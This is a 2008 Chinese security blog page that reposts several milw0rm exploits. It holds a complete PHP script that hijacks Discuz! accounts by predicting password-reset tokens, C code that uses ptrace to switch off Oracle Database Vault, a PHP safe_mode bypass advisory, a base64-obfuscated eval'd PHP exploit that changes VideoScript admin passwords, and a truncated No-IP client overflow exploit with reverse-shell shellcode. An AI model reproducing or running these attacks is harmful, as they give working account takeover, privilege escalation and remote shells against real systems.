矩阵毒刺 | Chinadu's Blog

Discuz! Remote Reset User Password Exploit

2008年11月23日 Chinadu 没有评论 65 views

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Discuz! Reset User Password Exploit by 80vul team: http://www.80vul.com +---------------------------------------------------------------------------+ '); if ($argc < 6) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user mail uid host: target server (ip/hostname) path: path to discuz user: user login name mail: user login mail uid: user login id Example: php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $mail = $argv[4]; $uid = $argv[5]; $fp = fsockopen($host, 80); $data = "GET ".$path."viewthread.php HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Keep-Alive: 300\r\n"; $data .= "Connection: keep-alive\r\n\r\n"; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash); if ($hash) break; } if ($hash) { $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); fclose($fp); preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid); if (!$sid) exit("Exploit Failed!\n"); $seed = getseed(); if ($seed) { mt_srand($seed); random(); mt_rand(); $id = random(); $fp = fsockopen($host, 80); $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); if (strpos($resp, '您的密码已重新设置，请使用新密码登录。') !== false) exit("Expoilt Success!\nUser New Password:\t123456\n"); else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); function getseed() { global $sid; for ($seed = 0; $seed <= 1000000; $seed ++) { mt_srand($seed); $id = random(6); if ($id == $sid[1]) return $seed; } return false; } function random($length = 6) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; for ($i = 0; $i < $length; $i ++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } ?> # milw0rm.com [2008-11-22]

分类: 矩阵毒刺标签:

Oracle Database Vault ptrace(2) Privilege Escalation Exploit

2008年11月21日 Chinadu 没有评论 74 views

/* * original release: http://vnull.pcnet.com.pl/blog/?p=92 * * ora_dv_mem_off.c version 0x1 * ORACLE Database Vault runtime disabler (x86_32 Linux only) * AKA give_back_the_freedom * by Jakub 'vnull' Wartak <jakub.wartak@gmail.com> 26.02.2008 * 0-day PRIVATE! D0 N0T DI$TRIBUT3! * * Tested on 10.2.0.3, CentOS 5. * For other architectures/OS combos consider having fun with gdb ;] * * Whole Database Vault architecture is flawed if DBA has access to * oracle user process space. IMHO you could limit risk by creating * UNIX accounts for DBAs with membership of OSDBA group (along with * oracle SUID binary and shared memory with only read permission * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs * would cope with some serious crashes (requiring for e.g. restoring * controlfile) ? * * Usage: * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty * $ ./ora_dv_mem_off * * REQUIEREMENTS: * + run as oracle process owner (by default "oracle") * + working ptrace(), it won't work in systems with ptrace() * disabled (grsecurity and some LKMs). * + BFD headers and library (binutils-devel) * * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, * LOSSES OR UNLAWFUL OFFENCES. * * USE AT OWN RISK! * */ #include <bfd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <linux/user.h> #include <linux/ptrace.h> #include <asm/unistd.h> /* for __NR_clone */ /* you may need to alter this */ #define ORABASE "/u01/app/oracle/product/10.2.0/bin" /* * Magic... (at&t syntax) * push %ebp * mov %esp, %ebp * mov <DV_FLAG>, %eax * [..] * where DV_FLAG is 32-bit long */ #define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" const char *sqlplus = ORABASE "/sqlplus"; const char *oracle = ORABASE "/oracle"; const int long_size = sizeof(long); pid_t child; long locate_dv_func(void) { asymbol **symbol_table; bfd *b = bfd_openr(oracle, NULL); if (b == NULL) { perror("bfd_openr"); exit(-1); } bfd_check_format(b, bfd_object); long storage_needed = bfd_get_symtab_upper_bound(b); if(storage_needed < 0) { fprintf(stderr, "wtf?!\n"); exit(-1); } if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { perror("malloc"); exit(-1); } int num_symbols; if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { fprintf(stderr, "no symbols info\n"); exit(-1); } int i; for(i = 0; i < num_symbols; i++) { char *symname = bfd_asymbol_name(symbol_table[i]); void *symaddr = bfd_asymbol_value(symbol_table[i]); /* don't even ask why this funciton, for real hardcore: gdb -p <oraclePIDs> */ if(!strcmp(symname, "kzvtins")) { fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), (long) symaddr); return (long) symaddr; } } return 0; } /* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ void getdata(pid_t child, long addr, char *str, int len) { char *laddr; int i, j; union u { long val; char chars[long_size]; } data; i = 0; j = len / long_size; laddr = str; while(i < j) { data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); memcpy(laddr, data.chars, long_size); ++i; laddr += long_size; } j = len % long_size; if(j != 0) { data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); memcpy(laddr, data.chars, j); } str[len] = '\0'; } void putdata(pid_t child, long addr, char *str, int len) { char *laddr; int i, j; union u { long val; char chars[long_size]; } d ata; i = 0; j = len / long_size; laddr = str; while(i < j) { memcpy(data.chars, laddr, long_size); ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); ++i; laddr += long_size; } j = len % long_size; if(j != 0) { memcpy(data.chars, laddr, j); ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); } } void cleanup(void) { int s; kill(child, SIGKILL); wait(&s); } int main(int ac, char **av) { int status; pid_t orapid = 0; bfd_init(); if((child = fork()) == -1) { perror("fork"); exit(-1); } if(child == 0) { if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { perror("unable to ptrace(PTRACE_TRACEME)"); exit(-1); } /* launch sqlplus */ if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { perror("execl"); exit(-1); } /* not reached */ exit(0); } if(atexit(cleanup) != 0) { fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); } wait(&status); if(WIFSTOPPED(status)) { fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); } fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); while(!orapid) { struct user_regs_struct uregs; ptrace(PTRACE_SYSCALL, child, 0, 0); wait(&status); ptrace(PTRACE_GETREGS, child, 0, &uregs); /* ouch! no fork()? clone()! */ if(uregs.orig_eax==__NR_clone) { long *regs = 0; /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ ptrace(PTRACE_SYSCALL, child, 0, 0); wait(&status); if((orapid = ptrace(PTRACE_PEEKUSER, child, &regs[EAX], 0)) == -1) { perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); exit(-1); } fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), child, orapid); /* attach to orapid, detach from sqlplus */ if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { perror("ptrace(PTRACE_ATTACH) to orapid"); exit(-1); } while(1) { ptrace(PTRACE_SYSCALL, orapid, 0, 0); wait(&status); ptrace(PTRACE_GETREGS, orapid, 0, &uregs); if(uregs.orig_eax==__NR_execve) { fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); /* end ptrace of syscall */ ptrace(PTRACE_SYSCALL, orapid, 0, 0); break; } else { //fprintf(stderr, "got %ld\n", uregs.orig_eax); ptrace(PTRACE_SYSCALL, orapid, 0, 0); } } if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { perror("ptrace(PTRACE_DETACH) from child"); exit(-1); } } else if(uregs.orig_eax==__NR_execve) { fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); } } /* now we have oracle server process under our control :) */ long dv_func = locate_dv_func(); if(dv_func == 0) { fprintf(stderr, "ERROR: unable to find function\n"); exit(-1); } wait(&status); unsigned char buf[32]; memset(buf, 0, sizeof(buf)); getdata(orapid, dv_func, (char *)&buf, 32); /* dump opcodes */ /* for(i = 0; i < 31; i++) { fprintf(stderr, "%x ", (unsigned char)buf[i]); } */ if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { unsigned char dv_status; unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; getdata(orapid, woff, (char *)&dv_status, 1); fprintf(stderr, "[***] su cessfuly validated function, DatabaseVault=%d\n", dv_status); fprintf(stderr, "[***] attempting to rewrite memory at 0x%lx\n", woff2); unsigned char my = 0; putdata(orapid, woff2, (void *)&my, 1); } if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { perror("ptrace(PTRACE_DETACH) from orapid"); exit(-1); } wait(&status); exit(0); } // milw0rm.com [2008-11-20]

分类: 矩阵毒刺标签:

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability

2008年11月21日 Chinadu 没有评论 69 views

[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.11.2008 - - Public: 20.11.2008 SecurityReason Research SecurityAlert Id: 57 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/57 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. error_log They allow you to define your own error handling rules, as well as modify the way the errors can be logged. This allows you to change and enhance error reporting to suit your needs. - --- 0. error_log const. bypassed by php_admin_flag --- The main problem is between using safe_mode in global mode php.ini: safe_mode = On and declaring via php_admin_flag <Directory "/www"> ... php_admin_flag safe_mode On </Directory> When we create some php script in /www/ and try call to: ini_set("error_log", "/hack/"); or in /www/.htaccess php_value error_log "/hack/bleh.php" Result: Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 It was for safe_mode declared in php.ini. But if we use php_admin_flag safe_mode On in httpd.conf, we will get only Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 syntax in .htaccess php_value error_log "/hack/blehx.php" is allowed and bypass safe_mode. example exploit: error_log("<?php phpinfo(); ?>", 0); - --- 2. How to fix --- Fixed in CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup Note: Do not use safe_mode as a main safety. --- 3. Greets --- sp3x Infospec schain p_e_a pi3 - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl # milw0rm.com [2008-11-20]

分类: 矩阵毒刺标签:

VideoScript <= 4.0.1.50 Admin Change Password Exploit

2008年11月19日 Chinadu 没有评论 64 views

<?php /* ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== VideoScript <= 4.0.1.50 Admin Change Password Exploit ============================================================================== [»] Script: [ VideoScript <= 4.0.1.50 ] [»] Language: [ PHP ] [»] Website: [ http://videoscript.co.uk/ ] [»] Type: [ Commercial ] [»] DOD: [ 15.11.2008 ] [»] Founder.Coder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== */ error_reporting(E_ALL); $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg". "ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg". "ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg". "ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN". "CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg". "IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg". "XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg". "ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg". "ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg". "ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg". "ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog". "ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc". "IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8". "X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg". "QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09". "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF". "T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u". "PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8". "PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw". "YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk". "YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6". "IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi". "c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". "c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls". "ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48". "YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h". "cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw". "dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg". "dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFA g". "c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg". "OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N". "Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0". "OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+". "DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg". "bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog". "bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti". "b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu". "YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg". "ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz". "c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl". "dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU". "WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn". "bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg". "Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc". "bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX". "aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw". "NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2". "ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D". "b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk". "LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr". "ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp". "ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0". "dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7". "Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw". "OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv". "Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn". "ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg". "fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz". "cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk". "IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw". "O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh". "c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". "c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP". "U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy". "IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw". "bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw". "OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g". "LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo="; eval(base64_decode($G4N0K)); /* ===[ LIVE ]=== [»] www.xxxuploads.co.uk [»] www.gayphp.com [»] ... ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D [»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah... [»] Str0ke //Hey Brotha keep rocking on ;) [»] Soudi-L0rd,Sakab... [»] SMN,MSD-KiD,AMD,MSN... Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) ALLAH,forgimme... */ ?> # milw0rm.com [2008-11-17]

分类: 矩阵毒刺标签: Exploit

No-IP DUC <= 2.1.7 Remote Code Execution Exploit

2008年11月19日 Chinadu 没有评论 78 views

/* _ __ __ ___ __ | |/ /__ ____ ____ / |/ /_ __/ /_____ _ | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ xenomuta [ arroba ] phreaker [ punto ] net http://xenomuta.tuxfamily.org/ - Methylxantina 256mg Permlink: http://xenomuta.tuxfamily.org/exploits/noIPwn3r.c ** noIPwn3r ** Exploit 0-day para el cliente DDNS noip-2.1.7 de linux Vulnerable: noip2-Linux <= 2.1.7 probado v.s. la version pre-compilada del cliente en Ubuntu 7.10, Slackware 10.2 y Centos 4.5 probablemente la version 64bits tambien es vulnerable. El programador confia a ciegas en la respuesta del servidor y plago el codigo de variables estaticas sin chequeo de size... Con un DNS envenenado o MITM podemos darle mambo. saludos a: 4rd3b4r4n, kakata, garay, str0ke y fr1t0l4y */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <fcntl.h> #include <assert.h> #define HTTP_OK "HTTP/1.1 200 OK\r\n\r\n" #define NOIP_PORT 8245 #define u_char unsigned char /* Offsets del shellcode x version * ( ubicalo aproximado con gdb, info addr buffer+32 ) */ struct OFFSET { char ver[7]; u_char offset[4]; int padding; } victima[] = { "custom", "\xff\xff\xff\xff", 162, "2.1.7", "\x5d\x1f\x05\x08", 162, "2.1.3", "\x5f\x12\x05\x08", 162, "2.1.1", "\xdd\x14\x05\x08", 138, "\x00", "\x00", 0 }; /* Una cacarita pa que rebale por si acaso */ char guineo[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90"; char shellcode[] = // Connect-back IP:puerto - Creditos para izik de tty64.org "\xb0\x17\x31\xdb\xcd\x80\x6a\x66" "\x58\x99\x6a\x01\x5b\x52\x53\x6a" "\x02\x89\xe1\xcd\x80\x5b\x5d\xbe" "\x80\xff\xff\xfe\xf7\xd6\x56\x66" "\xbd\x69\x7a\x0f\xcd\x09\xdd\x55" "\x43\x6a\x10\x51\x50\xb0\x66\x89" "\xe1\xcd\x80\x87\xd9\x5b\xb0\x3f" "\xcd\x80\x49\x79\xf9\xb0\x0b\x52" "\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; int uso () { fprintf(stderr, "Uso:\n ./noIPwn3r <ip escucha> <puerto escucha> [ 0xOFFSET ]\n\n"); fprintf(stderr, " Especifique el IP y puerto donde desea el shell reverso\n"); fprintf(stderr, " Puede usar un Offset arbitrario,\n - ejemplo: 0x08050c20 para la version 2.1.1 compilada en Redhat con gcc 3.4.6-9\n" ); fprintf(stderr, " Si no asigna el offset se usaran los de las versiones oficiales pre-compiladas.\n\n"); return -1; } void revshell(int sock, char *ip) { char *buf; int flags, i; long l; buf = (char *)malloc(1024); for (i = 0; i <= sock; i++) { flags = fcntl(i,F_GETFL,0); assert(flags != -1); fcntl(i, F_SETFL, flags | O_NONBLOCK); } while (1) { memset(buf, 0, 1024); if ((buf[0] = getchar()) > 0) { if ((send(sock, buf, strlen(buf), 0)) < 1) { break; } } memset(buf, 0, 1024); if (recv(sock, buf, 1024, 0) > 0) { write(1, buf, strlen(buf), 0); fflush(stdout); i = 1; } else if (i) { i = 0; printf("\nnoIPwn3r@%s$ ", ip); fflush(stdout); } } printf ("\n-= ADIOS =-\n"); return; } int main (int argc, char **argv) { char *xploit, *ver, *hexmap; u_char custom[4]; int i, v = 0, port; // Payola printf("\n noIPwn3r - xploit para noip-2.1.x linux\n"); printf(" _ __ __ ___ __\n"); printf(" | |/ /__ ____ ____ / |/ /_ __/ /_____ _\n"); printf(" | / _ \\/ __ \\/ __ \\/ /|_/ / / / / __/ __ `/\n"); printf(" / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / \n"); printf(" /_/|_\\___/_/ /_/\\____/_/&nb sp; /_/\\__,_/\\__/\\__,_/\n\n"); printf(" http://xenomuta.tuxfamily.org - xenomuta%cphreaker.net\n\n", '@'); if (argc < 3) return uso(); memset(custom, 0, 4); if (argv[3]) { if ((strlen(argv[3]) < 10) || (strncmp(argv[3],"0x", 2))) return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n"); hexmap = (char *)malloc(16); memset(hexmap, 0, 16); strcpy(hexmap, "0123456789ABCDEFabcdef"); for (i = 2; i < 10; i++) if (!strchr(hexmap, argv[3][i])) return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n"); for (i = 0; i < 4; i++) { custom[i] = (strchr(hexmap, (argv[3][8-(2*i)] >= 0x61)?argv[3][8-(2*i)] - 32:argv[3][8-(2*i)]) - hexmap) * 